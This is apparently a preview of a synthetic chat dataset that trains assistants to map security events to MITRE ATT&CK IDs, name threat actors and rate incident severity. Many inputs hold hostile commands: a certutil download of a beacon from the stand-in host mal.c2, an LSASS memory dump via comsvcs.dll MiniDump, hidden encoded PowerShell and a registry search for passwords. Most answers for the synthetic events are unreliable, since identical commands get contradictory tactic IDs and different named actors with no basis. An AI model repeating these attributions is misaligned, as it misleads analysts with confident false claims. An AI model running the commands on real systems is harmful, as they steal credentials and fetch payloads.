messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3803 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\",...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.179.227.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T107...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Remcos takes automated screenshots of the infected machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.189.164.67", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.", "role...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-BUMISAPJT8)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"sev...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.0.46.4", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3484 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.173.241.112", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-H15FRJJVHK)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Impact, Persistence", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3621 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.92.64.222", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 981 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.107.92.24", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-U8IVRRHH7F)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High\", \"b...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZIRCONIUM has exfiltrated files via the Dropbox API C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-S57DUQTF7J)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2842 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.186.249.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3028 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.90.23.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0043\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system", "role": "user" }, { "content": "{\"tact...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 599 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cuba can check if Russian language is installed on the infected machine by using the function GetKeyboardLayoutList.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-XG1OE8P58F)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Credential Access, Execution", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.37.136.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: C:\\Windows\\System32\\sethc.exe", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3055 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1122 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1010 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.129.208.149", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0007\"]...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Elise exfiltrates data using cookie values that are Base64-encoded.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Higaisa used JavaScript to execute additional files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoo...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-ZQXHFYKEIK)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Exfiltration", "role": "user" }, { "content": "{\"severit...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.81.230.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 936 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.71.105.142", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.48.227.225", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0003\"], \"techniqu...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"te...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.191.32.55", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1098.004\"]}", "...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Whitefly has the ability to download additional tools from the C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-L9T01FUYF6)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Exfiltration, Reconnaissance", "role": "user" }, { "c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Limit privileges of user accounts so only authorized users can edit the rc.common file.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037.004\", \"T1037\"]}", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For example, offline access and access to read emails should excite higher suspicions because adversaries can utilize SaaS APIs to discover credentials and other sensitive communications.", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-MIMOIGGY8R)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Discovery", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TrickBot downloads several additional files and saves them to the victim's machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "as...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-MHY6AT5SCO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.165.230.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Hildegard has established tmate sessions for C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1219\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.74.10.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0009\", \"T...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BONDUPDATER uses -windowstyle hidden to conceal a PowerShell window that downloads a payload.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.003\", \"T1564\"]}", "role": "assistan...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries will likely need to place new binaries in locations to be executed through this weakness.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1113 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.67.251.222", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0001\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-7XGLAQN8X7)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Initial Access, Lateral Movement", "role...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.51.143.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0009\", \"TA0001\"], ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Astaroth uses an external software known as NetPass to recover passwords.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1555\"]}", "role": "assistant" ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1691 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.29.22.162", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"]...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Aria-body has the ability to launch files using ShellExecute.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.74.28.246", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3704 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-T6EKT5XOJD)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Collection", "role": "user" }, { "content"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TrickBot can disable Windows Defender.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1562\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-052MLBKWO3)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Critical...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.154.229.181", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.120.137.87", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: On Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-I9RMH455ND)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Collection, Impact", "role": "user" }, { "conten...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: InvisiMole can deliver trojanized versions of software and documents, relying on user execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", "role": "assis...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.138.57.188", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0043\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-CMPSF5A1TI)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Privilege Escalation", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1042 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKLM /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.124.98.63", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0043...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3453 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: netsh can be used to set up a proxy tunnel to allow remote host access to an infected host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\"]}", "role": "assist...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-LJU6SGM4FW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Common subcommands include: launchctl load,launchctl unload, and launchctl start.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.001\", \"T1569\"]}", "role": "assista...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-RL63VO4S31)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery, Impact, Exfiltration", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-7H2Q2RG9GQ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Reconnaissance, Collection", "role": "user" }, {...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-1BBOA45BNR)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Privilege Escalation", "role": "user" }, { "conten...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This can be complemented by restricting direct internet access to the company’s internal networks while using proxies to access external resources", "role": "user" }, { "content": "{\"tactics\": [\"TA0011...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-W20UWVOWDK)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-B4G4SK1OBL)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Execution", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-PBX9PCWNXC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Reconnaissance, Execution", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-CJ3YXQM0IX)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Reconnaissance, Lateral Movement", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-FS7P449LY7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2304 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.47.209.66", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"]...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Babuk can use \"WNetOpenEnumW\" and \"WNetEnumResourceW\" to enumerate files in network resources for encryption.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-T4VA0AIZV5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...